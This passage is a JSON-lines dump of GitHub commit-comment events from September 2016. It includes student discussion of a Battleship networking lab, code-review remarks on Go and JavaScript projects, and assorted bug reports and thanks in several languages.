on GitHub\n> <https://github.com/Emmanuel-Benvenutto/startup/commit/897b192e43b0ecf41edc9ef67bdd4ebfdffc364c#commitcomment-19067923>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANE6GpbEcWUgY0y1rKRDt30qKiC0YAXYks5qrHjHgaJpZM4J_t2F>\n> .\n>\n"}},"created_at":"2016-09-18T00:23:08Z"}
{"id":"4578918248","type":"CommitCommentEvent","actor":{"login":"Emmanuel-Armstrong"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19068125,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-18T00:23:57Z","updated_at":"2016-09-18T00:23:57Z","body":"Hey guys, sorry I haven't got back to you until now, ended up having a way\nbusier Saturday than I expected too.  I'm gonna get some work in tonight\nbut should have a lot of time tomorrow to finish up my part!\n\nOn Sep 17, 2016 6:10 PM, \"tyler-sassaman\" <notifications@github.com> wrote:\n\n> I was thinking about tracking sunk ships. Just a thought, but what if we\n> had a global variable for each ship (carrier = 5), and every time we hit\n> that type of ship we decrement that value, and compare it to 0. so if\n> carrier gets to 0 then it has been hit 5 times which is the same thing as\n> being sunk.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19068085>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANiCOTr8_TuYeai0VfkV7YPDjycTvYJpks5qrIFygaJpZM4J_dYG>\n> .\n>\n"}},"created_at":"2016-09-18T00:23:57Z"}
{"id":"4578919222","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19068127,"position":null,"line":null,"path":null,"commit_id":"6930e27842ee312a2fbf2eba26b120dbf7fac310","created_at":"2016-09-18T00:24:53Z","updated_at":"2016-09-18T00:24:53Z","body":"Also see [Tweakable Block Ciphers](https://people.eecs.berkeley.edu/~daw/papers/tweak-crypto02.pdf) by Liskov, Rivest and Wagner. From the paper:\r\n\r\n> For this operator, we call the new (second) input a *\"tweak\"* rather than a *\"nonce\"*\r\n> or *\"initialization vector,\"* but the intent is similar. A tweakable block cipher thus takes three\r\n> inputs *a key* K ∈ {0,1}<sup>k</sup>, *a tweak* T ∈ {0,1}<sup>t</sup>, and *a message* (or\r\n> *plaintext*) M ∈ {0,1}<sup>n</sup> -- and produces as output *a ciphertext* C ∈ {0,1}<sup>n</sup>.\r\n> "}},"created_at":"2016-09-18T00:24:53Z"}
{"id":"4578919682","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19068128,"position":null,"line":null,"path":null,"commit_id":"63d881aff52fbda7a22a24c77fd01641b76656ef","created_at":"2016-09-18T00:25:21Z","updated_at":"2016-09-18T00:25:21Z","body":"Was breaking BE'd pets and causing them to massively devolve. Bringing up on dev to do a ifnal test"}},"created_at":"2016-09-18T00:25:21Z"}
{"id":"4578920684","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19068134,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-18T00:26:14Z","updated_at":"2016-09-18T00:26:14Z","body":"It is getting the fire commands from the command line arguments, that is\nwhy the client is being invoked every play. The connection is made with the\nport number and IP address passed in from the command line arguments. I\nhave already wrote the code for the connection using the socket library.\nThev ariables for the x and y coords passed from the command line are\nworking just as you had them in your test.py, I added it to the client.py\nfile already. These variable will be used in the methods that send the http\nmessage. The http and passing in the variable I think will be the easy\npart, some of it is done and it works. The time consuming part is going to\nbe writing the code to maintain the board and \"serving\" the display of the\nboard.\nTracking sunk ships will work as you suggested and this will be put in a\nmethod called from read_board or process_reply or done inside of\nprocess_reply.\n\nOn Sat, Sep 17, 2016 at 6:10 PM, tyler-sassaman <notifications@github.com>\nwrote:\n\n> I was thinking about tracking sunk ships. Just a thought, but what if we\n> had a global variable for each ship (carrier = 5), and every time we hit\n> that type of ship we decrement that value, and compare it to 0. so if\n> carrier gets to 0 then it has been hit 5 times which is the same thing as\n> being sunk.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19068085>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AE8DG_y6gkDXIV5_YwVT263okb39zDjcks5qrIFygaJpZM4J_dYG>\n> .\n>\n"}},"created_at":"2016-09-18T00:26:14Z"}
{"id":"4578921508","type":"CommitCommentEvent","actor":{"login":"ckaminer"},"repo":{"name":"ckaminer/scale_up"},"payload":{"comment":{"id":19068137,"position":null,"line":null,"path":null,"commit_id":"339e1ac538c07f737177cf6c9dc763d6033f3613","created_at":"2016-09-18T00:27:02Z","updated_at":"2016-09-18T00:27:02Z","body":"Runner file for eventual regression analysis.  Run file followed by mlb team name for an array to be returned containing run totals for the given team over the last 5 seasons at home."}},"created_at":"2016-09-18T00:27:02Z"}
{"id":"4578921682","type":"CommitCommentEvent","actor":{"login":"realro"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19068139,"position":null,"line":null,"path":null,"commit_id":"3f93339e837f953a1f985d2cd9a8af45beb28412","created_at":"2016-09-18T00:27:12Z","updated_at":"2016-09-18T00:27:12Z","body":"Ok X3 Complete Thank you.\r\n\r\nDunstleOS\r\nUnknow item\r\n"}},"created_at":"2016-09-18T00:27:12Z"}
{"id":"4578921696","type":"CommitCommentEvent","actor":{"login":"Fanael"},"repo":{"name":"purcell/flycheck-package"},"payload":{"comment":{"id":19068140,"position":null,"line":null,"path":null,"commit_id":"086a98a100d7eab708e3951c60ee93454cf20e8e","created_at":"2016-09-18T00:27:13Z","updated_at":"2016-09-18T00:27:13Z","body":"This was supposed to be a separate branch and a PR, but if `git branch foo` switched you to the new branch, that would be too obvious and useful, and we all know Git can't have none of that."}},"created_at":"2016-09-18T00:27:13Z"}
{"id":"4578922140","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19068142,"position":null,"line":null,"path":null,"commit_id":"2bfb4b6f361ac441889b5b6422d689bd4a04645d","created_at":"2016-09-18T00:27:40Z","updated_at":"2016-09-18T00:27:40Z","body":"Thanks for updating the .exe because I'm using linux xD"}},"created_at":"2016-09-18T00:27:40Z"}
{"id":"4578924718","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19068149,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-18T00:30:09Z","updated_at":"2016-09-18T00:30:09Z","body":"Right now the server is on 127.0.0.1( i may have the address wrong but it\nshould be the address of localhost, which is the same no matter what\nmachine it is running on) just to run it on your local machine to test, it\nwill be changed to the ip address of the machine it is running on when they\ngrade it.\n\nOn Sat, Sep 17, 2016 at 6:26 PM, David Schwehr <dpschwehr@gmail.com> wrote:\n\n> It is getting the fire commands from the command line arguments, that is\n> why the client is being invoked every play. The connection is made with the\n> port number and IP address passed in from the command line arguments. I\n> have already wrote the code for the connection using the socket library.\n> Thev ariables for the x and y coords passed from the command line are\n> working just as you had them in your test.py, I added it to the client.py\n> file already. These variable will be used in the methods that send the http\n> message. The http and passing in the variable I think will be the easy\n> part, some of it is done and it works. The time consuming part is going to\n> be writing the code to maintain the board and \"serving\" the display of the\n> board.\n> Tracking sunk ships will work as you suggested and this will be put in a\n> method called from read_board or process_reply or done inside of\n> process_reply.\n>\n> On Sat, Sep 17, 2016 at 6:10 PM, tyler-sassaman <notifications@github.com>\n> wrote:\n>\n>> I was thinking about tracking sunk ships. Just a thought, but what if we\n>> had a global variable for each ship (carrier = 5), and every time we hit\n>> that type of ship we decrement that value, and compare it to 0. so if\n>> carrier gets to 0 then it has been hit 5 times which is the same thing as\n>> being sunk.\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19068085>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AE8DG_y6gkDXIV5_YwVT263okb39zDjcks5qrIFygaJpZM4J_dYG>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-18T00:30:09Z"}
{"id":"4578925161","type":"CommitCommentEvent","actor":{"login":"ask"},"repo":{"name":"celery/celery"},"payload":{"comment":{"id":19068150,"position":null,"line":null,"path":null,"commit_id":"fff12f08af8539c3e2e3c73733e69ce26e98194a","created_at":"2016-09-18T00:30:29Z","updated_at":"2016-09-18T00:30:29Z","body":"hmm, that's a very good point.  The new django-celery-beat and django-celery-results packages are actually 1.8+ already!"}},"created_at":"2016-09-18T00:30:29Z"}
{"id":"4578926166","type":"CommitCommentEvent","actor":{"login":"corny"},"repo":{"name":"hnakamur/go-sshd"},"payload":{"comment":{"id":19068154,"position":40,"line":87,"path":"server.go","commit_id":"fd0ed5dd58e3379905116cd551b21b98124cafb7","created_at":"2016-09-18T00:31:24Z","updated_at":"2016-09-18T00:31:24Z","body":"Mh I checked again and a bool read/write is not guaranteed to be atomic. You can keep your code, you can use the `sync/atomic` package, or you use https://github.com/tevino/abool\r\n`IsClosed()` can be also simplified like this:\r\n\r\n```go\r\n\ts.mu.Lock()\r\n\tdefer s.mu.Unlock()\r\n\treturn s.closed\r\n\r\n``` "}},"created_at":"2016-09-18T00:31:24Z"}
{"id":"4578926217","type":"CommitCommentEvent","actor":{"login":"SDCSprl"},"repo":{"name":"SDCSnz/SDCS-Hi-There"},"payload":{"comment":{"id":19068155,"position":null,"line":null,"path":null,"commit_id":"3eb7174b83cbde664c8806583891436f2f796711","created_at":"2016-09-18T00:31:27Z","updated_at":"2016-09-18T00:31:27Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;yKmvUjPj&#x2F;2-ddd\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> ddd</a>"}},"created_at":"2016-09-18T00:31:27Z"}
{"id":"4578926395","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"RJDTWO/intoxicated-boeffla"},"payload":{"comment":{"id":19068156,"position":null,"line":null,"path":null,"commit_id":"86d2bc1175feb6f8acbd8c60212404e0dce47509","created_at":"2016-09-18T00:31:37Z","updated_at":"2016-09-18T00:31:37Z","body":"Hey don't know if it's still an issue for you, but neobuddy89 implemented a thermal hook for his msm_limiter driver that you might be able to adapt to hard limit!"}},"created_at":"2016-09-18T00:31:37Z"}
{"id":"4578928404","type":"CommitCommentEvent","actor":{"login":"nhooyr"},"repo":{"name":"Mic92/nixpkgs"},"payload":{"comment":{"id":19068165,"position":null,"line":null,"path":null,"commit_id":"64ee5884360d2b2e178cf98ecb54163ee1423265","created_at":"2016-09-18T00:33:18Z","updated_at":"2016-09-18T00:33:18Z","body":"Thank you for the very quick fix 💃 "}},"created_at":"2016-09-18T00:33:18Z"}
{"id":"4578929267","type":"CommitCommentEvent","actor":{"login":"dianaramirezfigueroa"},"repo":{"name":"dianaramirezfigueroa/VETMAP"},"payload":{"comment":{"id":19068168,"position":null,"line":null,"path":null,"commit_id":"6a6e55708cf28370ba4d21bb01ecc5e971321ea2","created_at":"2016-09-18T00:34:01Z","updated_at":"2016-09-18T00:34:01Z","body":"En esta imagen podemos evidenciar la nueva versión del diagrama de distribución con las correcciones indicadas y actualizadas\r\n![despliegue](https://cloud.githubusercontent.com/assets/20650800/18611845/9f6f126c-7d0d-11e6-81ac-885f311c0a17.jpg)\r\n"}},"created_at":"2016-09-18T00:34:01Z"}
{"id":"4578931129","type":"CommitCommentEvent","actor":{"login":"dianaramirezfigueroa"},"repo":{"name":"dianaramirezfigueroa/VETMAP"},"payload":{"comment":{"id":19068173,"position":null,"line":null,"path":null,"commit_id":"6a6e55708cf28370ba4d21bb01ecc5e971321ea2","created_at":"2016-09-18T00:35:20Z","updated_at":"2016-09-18T00:35:20Z","body":"En este documento podemos ver el diagrama de clases de nuestro proyecto \r\n![main](https://cloud.githubusercontent.com/assets/20650800/18611854/d63f388a-7d0d-11e6-96d9-747a6419bcd0.jpg)\r\n\r\n"}},"created_at":"2016-09-18T00:35:20Z"}
{"id":"4578931279","type":"CommitCommentEvent","actor":{"login":"RJDTWO"},"repo":{"name":"RJDTWO/intoxicated-boeffla"},"payload":{"comment":{"id":19068174,"position":null,"line":null,"path":null,"commit_id":"86d2bc1175feb6f8acbd8c60212404e0dce47509","created_at":"2016-09-18T00:35:27Z","updated_at":"2016-09-18T00:35:27Z","body":"@robcore Thanks! I'll definitely look into it"}},"created_at":"2016-09-18T00:35:27Z"}
{"id":"4578931449","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19068175,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-18T00:35:34Z","updated_at":"2016-09-18T00:35:34Z","body":"Just checked, the address for localhost is correct, the port numbers and ip\nbeing set from command line arguments is already implemented and I checked\nthe connection already. I was going to play around with different ways of\nmaking the board and http stuff next. I put a board.txt file in the folder\ntoo to use to test reading the file and creating an array or list of lists\nfor the board.\nRemember to git pull before working on anything to make sure you have the\nmost recent version.\nI will be working on it some tonight and spending most the day on it\ntomorrow.\n\nOn Sat, Sep 17, 2016 at 6:30 PM, David Schwehr <dpschwehr@gmail.com> wrote:\n\n> Right now the server is on 127.0.0.1( i may have the address wrong but it\n> should be the address of localhost, which is the same no matter what\n> machine it is running on) just to run it on your local machine to test, it\n> will be changed to the ip address of the machine it is running on when they\n> grade it.\n>\n> On Sat, Sep 17, 2016 at 6:26 PM, David Schwehr <dpschwehr@gmail.com>\n> wrote:\n>\n>> It is getting the fire commands from the command line arguments, that is\n>> why the client is being invoked every play. The connection is made with the\n>> port number and IP address passed in from the command line arguments. I\n>> have already wrote the code for the connection using the socket library.\n>> Thev ariables for the x and y coords passed from the command line are\n>> working just as you had them in your test.py, I added it to the client.py\n>> file already. These variable will be used in the methods that send the http\n>> message. The http and passing in the variable I think will be the easy\n>> part, some of it is done and it works. The time consuming part is going to\n>> be writing the code to maintain the board and \"serving\" the display of the\n>> board.\n>> Tracking sunk ships will work as you suggested and this will be put in a\n>> method called from read_board or process_reply or done inside of\n>> process_reply.\n>>\n>> On Sat, Sep 17, 2016 at 6:10 PM, tyler-sassaman <notifications@github.com\n>> > wrote:\n>>\n>>> I was thinking about tracking sunk ships. Just a thought, but what if we\n>>> had a global variable for each ship (carrier = 5), and every time we hit\n>>> that type of ship we decrement that value, and compare it to 0. so if\n>>> carrier gets to 0 then it has been hit 5 times which is the same thing as\n>>> being sunk.\n>>>\n>>> —\n>>> You are receiving this because you authored the thread.\n>>> Reply to this email directly, view it on GitHub\n>>> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19068085>,\n>>> or mute the thread\n>>> <https://github.com/notifications/unsubscribe-auth/AE8DG_y6gkDXIV5_YwVT263okb39zDjcks5qrIFygaJpZM4J_dYG>\n>>> .\n>>>\n>>\n>>\n>\n"}},"created_at":"2016-09-18T00:35:34Z"}
{"id":"4578935485","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19068187,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-18T00:38:38Z","updated_at":"2016-09-18T00:38:38Z","body":"`\r\n\r\n#[- [ ] 1. \r\n- [ ] 2. \r\n- [ ] 3. `](url)"}},"created_at":"2016-09-18T00:38:38Z"}
{"id":"4578937612","type":"CommitCommentEvent","actor":{"login":"hnakamur"},"repo":{"name":"hnakamur/go-sshd"},"payload":{"comment":{"id":19068196,"position":40,"line":87,"path":"server.go","commit_id":"fd0ed5dd58e3379905116cd551b21b98124cafb7","created_at":"2016-09-18T00:40:18Z","updated_at":"2016-09-18T00:40:18Z","body":"I use `defer` only for more complicated cases which have multiple `return`s, like:\r\nhttps://github.com/hnakamur/go-scp/blob/86371df4ba989ba7132e59940b91fc7daac8ab72/sink.go#L313\r\n\r\nIn this case, I prefer not to use `defer` to avoid the overhead of it.\r\n\r\n* [\\[go-nuts\\] Defer performance - Grokbase](http://grokbase.com/t/gg/golang-nuts/158zz5p42w/go-nuts-defer-performance)"}},"created_at":"2016-09-18T00:40:18Z"}
{"id":"4578939742","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19068205,"position":null,"line":null,"path":null,"commit_id":"d30f3ff39c841117654e71753ef6803bb988ed71","created_at":"2016-09-18T00:42:05Z","updated_at":"2016-09-18T00:42:05Z","body":"Build report #160751930 for sha d30f3ff39c841117654e71753ef6803bb988ed71:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1793%20/%208225%20%2821.80%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-18T00:42:05Z"}
{"id":"4578941704","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"ACID-Scripts/TBC"},"payload":{"comment":{"id":19068209,"position":null,"line":null,"path":null,"commit_id":"6ab8c8ef3b727a38b278b350310c15cf9f1f5e0f","created_at":"2016-09-18T00:43:51Z","updated_at":"2016-09-18T00:43:51Z","body":"Closes: https://github.com/ACID-Scripts/TBC/issues/31"}},"created_at":"2016-09-18T00:43:51Z"}
{"id":"4578945093","type":"CommitCommentEvent","actor":{"login":"mclarekin"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":19068216,"position":null,"line":null,"path":null,"commit_id":"32b8b89ec7bcf47855385b58b56ede22705c9ef7","created_at":"2016-09-18T00:46:51Z","updated_at":"2016-09-18T00:46:51Z","body":"This will be useful for me, thanks\n\nOn Sun, Sep 18, 2016 at 2:33 AM, Krzysztof Marczak <notifications@github.com\n> wrote:\n\n> When settings are loaded only popup window is showed but text is not\n> displayed in new description editor\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/buddhi1980/mandelbulber2/commit/32b8b89ec7bcf47855385b58b56ede22705c9ef7#commitcomment-19064869>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMLZHHuYj72dadu-SJSs1CdXwr8XCPCcks5qq_oggaJpZM4J_nL7>\n> .\n>\n"}},"created_at":"2016-09-18T00:46:51Z"}
{"id":"4578948960","type":"CommitCommentEvent","actor":{"login":"rafaelcp"},"repo":{"name":"rafaelcp/Open-Mega-Engine"},"payload":{"comment":{"id":19068225,"position":null,"line":null,"path":null,"commit_id":"75131798fc4fdd01a5df02f5664b78b1af2466ad","created_at":"2016-09-18T00:50:45Z","updated_at":"2016-09-18T00:50:45Z","body":"Actually, there is one more problem: there is no damage code (should be on prtEnemy)."}},"created_at":"2016-09-18T00:50:45Z"}
{"id":"4578951910","type":"CommitCommentEvent","actor":{"login":"zivil"},"repo":{"name":"zivil/homework"},"payload":{"comment":{"id":19068231,"position":null,"line":null,"path":null,"commit_id":"49c7533c6906159b36360b44bab307b6d2f82be3","created_at":"2016-09-18T00:53:10Z","updated_at":"2016-09-18T00:53:10Z","body":"this is the homework zero"}},"created_at":"2016-09-18T00:53:10Z"}
{"id":"4578952576","type":"CommitCommentEvent","actor":{"login":"Zangetsu38"},"repo":{"name":"Zangetsu38/rpcs3"},"payload":{"comment":{"id":19068233,"position":null,"line":null,"path":null,"commit_id":"6a34e500935eaa3c483b9f019326eb4bf221e480","created_at":"2016-09-18T00:53:50Z","updated_at":"2016-09-18T00:53:50Z","body":"@vlj tu peut le prendre pour la master ? je l'ai bien tester et parfaitement fonctionnelle "}},"created_at":"2016-09-18T00:53:50Z"}
{"id":"4578952666","type":"CommitCommentEvent","actor":{"login":"ethanbanker2428"},"repo":{"name":"TeslaRom-N/vendor_tesla"},"payload":{"comment":{"id":19068235,"position":null,"line":null,"path":null,"commit_id":"2ebecc5aa37a77d1ba65eb38c860cd3f1839ec6b","created_at":"2016-09-18T00:53:55Z","updated_at":"2016-09-18T00:53:55Z","body":"https://github.com/Hydra-OS/vendor_hydra/commit/1384c00c60dbfe442fcca6fa4d4684e5ce26323b"}},"created_at":"2016-09-18T00:53:55Z"}
{"id":"4578953480","type":"CommitCommentEvent","actor":{"login":"wkeese"},"repo":{"name":"brunano21/deliteful"},"payload":{"comment":{"id":19068239,"position":111,"line":743,"path":"Combobox.js","commit_id":"43b46217f1a746e36edc61c5d1f4c270f03b112b","created_at":"2016-09-18T00:54:39Z","updated_at":"2016-09-18T00:54:39Z","body":"Are you talking about setting `this.list.query = {}` in order to fetch all the data?  Or setting `this.list.source = null` to cancel the in-flight query?"}},"created_at":"2016-09-18T00:54:39Z"}
{"id":"4578954441","type":"CommitCommentEvent","actor":{"login":"losh11"},"repo":{"name":"LitecoinNode/bootstrap.litecoinnode.org"},"payload":{"comment":{"id":19068245,"position":null,"line":null,"path":null,"commit_id":"67bea8c6630692a1090e8bfc3a5b67765d458f24","created_at":"2016-09-18T00:55:32Z","updated_at":"2016-09-18T00:55:32Z","body":"@LitecoinNode Some people are asking for SHA256 because SHA1 and MD5 hash collisions are possible."}},"created_at":"2016-09-18T00:55:32Z"}
{"id":"4578954625","type":"CommitCommentEvent","actor":{"login":"wkeese"},"repo":{"name":"brunano21/deliteful"},"payload":{"comment":{"id":19068246,"position":53,"line":78,"path":"samples/Combobox.html","commit_id":"43b46217f1a746e36edc61c5d1f4c270f03b112b","created_at":"2016-09-18T00:55:42Z","updated_at":"2016-09-18T00:55:42Z","body":"Yes, sounds good (although if the function returns something it should be called `getQuery()` rather than `setQuery()`."}},"created_at":"2016-09-18T00:55:42Z"}
{"id":"4578955607","type":"CommitCommentEvent","actor":{"login":"Zangetsu38"},"repo":{"name":"Zangetsu38/rpcs3"},"payload":{"comment":{"id":19068252,"position":null,"line":null,"path":null,"commit_id":"7f025a47f1a43768c8fdfb2e1e6c9d6b176c6b0e","created_at":"2016-09-18T00:56:35Z","updated_at":"2016-09-18T00:56:35Z","body":"@vlj tu peut le prendre pour la master ? je l'ai bien tester et parfaitement fonctionnelle\r\nil manque juste le changement de l'archive pour apreveyor, mais les lib sur dispo ici http://llvm.org/releases/download.html#3.9.0"}},"created_at":"2016-09-18T00:56:35Z"}
{"id":"4578956874","type":"CommitCommentEvent","actor":{"login":"criezy"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19068255,"position":167,"line":2174,"path":"backends/graphics/surfacesdl/surfacesdl-graphics.cpp","commit_id":"05bc82b6225f79ad42e6259be8e227aed6e7c0dc","created_at":"2016-09-18T00:57:53Z","updated_at":"2016-09-18T00:57:53Z","body":"I just hit that assert, starting a game from the launcher with custom graphics settings (full screen while the launcher is windowed) and while synchronisation of save games was starting.\r\nI am wondering if this assert still makes sense after your changes and how we should handle the case when this function is called while _transactionMode is not kTransationNone."}},"created_at":"2016-09-18T00:57:53Z"}
{"id":"4578959748","type":"CommitCommentEvent","actor":{"login":"pakphumlp"},"repo":{"name":"googleads/google-media-framework-android"},"payload":{"comment":{"id":19068267,"position":7,"line":6,"path":"gradle/wrapper/gradle-wrapper.properties","commit_id":"2a11e06cfac93367b0a3f555c1a9ff6097edeb55","created_at":"2016-09-18T01:00:26Z","updated_at":"2016-09-18T01:00:26Z","body":"how to install"}},"created_at":"2016-09-18T01:00:26Z"}
{"id":"4578963530","type":"CommitCommentEvent","actor":{"login":"vipar"},"repo":{"name":"UnrealCourse/03_BuildingEscape"},"payload":{"comment":{"id":19068273,"position":null,"line":null,"path":null,"commit_id":"b74a2161bfdfb7875273de0be892f28330415c3a","created_at":"2016-09-18T01:02:58Z","updated_at":"2016-09-18T01:02:58Z","body":"Hey Ben just a heads up\r\n\r\nI am using UE 4.12.5 and when I ran this code the Editor immediately crashed saying there was something wrong at line 47 in OpenDoor.cpp. I went ahead and looked and this line is there:\r\n\r\n`if (PressurePlate->IsOverlappingActor(ActorThatOpens))`\r\n\r\nSo I did a bit of bug testing and it appears that, perhaps since 4.10 they did a few changes to how this works because the culprit was that one of the doors didn't have a pressure plate. As soon as I gave the door a pressure plate it started working again. So my workaround to allow for doors to have null references to a trigger volume became this:\r\n\r\n```\r\nif (PressurePlate)\r\n{\r\n\tif (PressurePlate->IsOverlappingActor(ActorThatOpens))\r\n\t{\r\n\t\tOpenDoor();\r\n\t}\r\n}\r\n```"}},"created_at":"2016-09-18T01:02:58Z"}
{"id":"4578966901","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"MOVZX/Kenzo"},"payload":{"comment":{"id":19068276,"position":null,"line":null,"path":null,"commit_id":"fbfe5c5159a472f1562ead9ba542066a7d307700","created_at":"2016-09-18T01:05:53Z","updated_at":"2016-09-18T01:05:53Z","body":"No problem mate, this kernel is just for my personal purpose only, not shared publicly on XDA."}},"created_at":"2016-09-18T01:05:53Z"}
{"id":"4578971776","type":"CommitCommentEvent","actor":{"login":"fscheinfeld"},"repo":{"name":"slqboy/Emprendevs"},"payload":{"comment":{"id":19068279,"position":null,"line":null,"path":null,"commit_id":"36ee52679925f1dcde89130144e31a84391d2870","created_at":"2016-09-18T01:10:11Z","updated_at":"2016-09-18T01:10:11Z","body":"Se agrega un procedimiento para actualizar la experiencia, el nivel, y felicitar al jugador de haber progresado."}},"created_at":"2016-09-18T01:10:11Z"}
{"id":"4578973039","type":"CommitCommentEvent","actor":{"login":"Pesthuf"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19068282,"position":null,"line":null,"path":null,"commit_id":"b5035582b656df780e8ebeeb3647288bf1be8256","created_at":"2016-09-18T01:11:18Z","updated_at":"2016-09-18T01:11:18Z","body":"Shouldn't Earth shield only scale with Spellpower on the initial cast?"}},"created_at":"2016-09-18T01:11:18Z"}
{"id":"4578974035","type":"CommitCommentEvent","actor":{"login":"fscheinfeld"},"repo":{"name":"slqboy/Emprendevs"},"payload":{"comment":{"id":19068287,"position":null,"line":null,"path":null,"commit_id":"2709fcef760e9bcb8b1be192d388fd7478c7d3a7","created_at":"2016-09-18T01:12:10Z","updated_at":"2016-09-18T01:12:10Z","body":"Se crea un procedimiento para Elegir una categoría, pregunta y orden de las respuestas aleatoriamente."}},"created_at":"2016-09-18T01:12:10Z"}
{"id":"4578982693","type":"CommitCommentEvent","actor":{"login":"adriano003"},"repo":{"name":"adriano003/Turma-2016023-Sistema-de-Farmacia"},"payload":{"comment":{"id":19068300,"position":null,"line":null,"path":null,"commit_id":"cf0ccdc1070e6cc8335dd5ef4c0327a1c5c1be30","created_at":"2016-09-18T01:19:33Z","updated_at":"2016-09-18T01:19:33Z","body":"Diagrama de Classes"}},"created_at":"2016-09-18T01:19:33Z"}
{"id":"4578984045","type":"CommitCommentEvent","actor":{"login":"rafaelcp"},"repo":{"name":"rafaelcp/Open-Mega-Engine"},"payload":{"comment":{"id":19068302,"position":null,"line":null,"path":null,"commit_id":"75131798fc4fdd01a5df02f5664b78b1af2466ad","created_at":"2016-09-18T01:20:35Z","updated_at":"2016-09-18T01:20:35Z","body":"2 more observations:\r\n\r\n1. Flash Bomb's explosion seems to have 3 seconds duration. Take a look here: https://www.youtube.com/watch?v=bpIyokgbgwU . But instead of replicating the animation many times in the sprite, start a timer on the explosion create event (alarm[0] = room_speed * 3, then on the alarm 0 event just destroy the instance).\r\n2. The explosion is bigger than MM (it is even useful for hiding behind it to protect from enemies). I suggest you to use the sprites from Rockman 8 FC: http://www.spriters-resource.com/pc_computer/rockman8fcmegaman8fc/sheet/56275/"}},"created_at":"2016-09-18T01:20:35Z"}
{"id":"4578984187","type":"CommitCommentEvent","actor":{"login":"tkntrec"},"repo":{"name":"xtne6f/EDCB"},"payload":{"comment":{"id":19068303,"position":null,"line":null,"path":null,"commit_id":"0771bd44a8ab25df7c37eef5fa9fda609309afa5","created_at":"2016-09-18T01:20:43Z","updated_at":"2016-09-18T01:20:43Z","body":"修正コミットで解消しているのを確認しました。\r\n確かに見ための変更は少ないですが実行タイミングがゴソッと変わってますね。\r\n\r\nEpgTimer側しかいじらない自分が言うのもなんですが、\r\nメッセージループとかロック関係はうっかりすると簡単に不具合になって怖いですね。"}},"created_at":"2016-09-18T01:20:43Z"}
